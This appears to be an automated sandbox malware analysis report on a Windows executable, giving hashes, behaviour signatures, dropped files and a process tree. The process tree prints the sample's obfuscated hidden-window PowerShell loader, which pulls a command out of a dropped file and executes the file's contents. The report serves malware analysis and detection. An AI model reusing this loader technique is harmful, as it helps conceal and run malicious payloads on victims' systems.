Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-10-2024 16:08

General

  • Target

    Miljpaavirkningen.exe

  • Size

    895KB

  • MD5

    0327d3ca2373bdcfad29ae18a7554884

  • SHA1

    92ce0598c98f0ddc2ae136491f0e988ddcf29d49

  • SHA256

    eb60de90ee98dcc76c344d75d96f2eb72bd4466a504f2668a660ec928abf07e1

  • SHA512

    efdd810fab7b956116a99ba2d78e723474e14343c8cd5cde01ae8cb61a441aad14f516a151c530b42b7b8b1760405ca87c9415cbf53a541190c92e2250c751ee

  • SSDEEP

    12288:N5e/L/ujA9jjzAmiTs3QCXDzo3vKz/oByv268ODurlKRFP7Pytafm6wY8yujWX6d:abu0wmt43w/9268OD6lm7Pytae6/B1G5

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe
    "C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1784
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2348

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Damascenere.lnk

    Filesize

    803B

    MD5

    47027ef7e3a1709e131ffb08a50b6be2

    SHA1

    1516a214287a748dd3e02d73d8373a0baeddf352

    SHA256

    4997726a61b3c10d6a7ed878463f680007b13dcd9533aa310b28888967d17d32

    SHA512

    90d60995db3dca664f59a3780e7b141bc66fee80034d0372e2e8e90baf6acbc6ed8ca6da25e8d937a24b4aec057c260762fd351e4dd73f1a7aa179a4d87298ff

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Damascenere.lnk

    Filesize

    849B

    MD5

    68f169ee1b757b8cb3fd66b93b245af7

    SHA1

    79eca9a98803d71953c27c6a6768283ee4fc632e

    SHA256

    6a308dc4a480f127088ad672a858e09d50d64e63af14078136a80ba62c3dab69

    SHA512

    3655c18733e86e6011b7b33c24a4ce816d16197d958a4906790b2d94e979730c50a2f4d17a0037ccf0ed828cd403cb144eb913d80376355ded94752b43561d23

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    5332cfad5e06f4af65d0cccf541224cf

    SHA1

    acaa9c5e63e880690fb03979b3a2e152db600a55

    SHA256

    b515fe43377ba9c68edf2f6ad21d150d7f5561fbdc23bd0bb634076243a8283f

    SHA512

    55c220f2e86dd69fbe12aaef80a86d9aa44564d1d6d41f040b3944ba73abdbc57f27b09f0c2b84ead6690db15977f14b3b95135ddca1ed3aac45812c23525dde

  • C:\Windows\Resources\Nebengeschfter.ini

    Filesize

    32B

    MD5

    53898e643bd3e0ca22a462325ad62da4

    SHA1

    e0f08a75fa5219f39e49c1b9f361119905da7d02

    SHA256

    b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff

    SHA512

    aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca

  • memory/1784-169-0x0000000074261000-0x0000000074262000-memory.dmp

    Filesize

    4KB

  • memory/1784-170-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/1784-171-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/1784-174-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/1784-175-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/1784-328-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB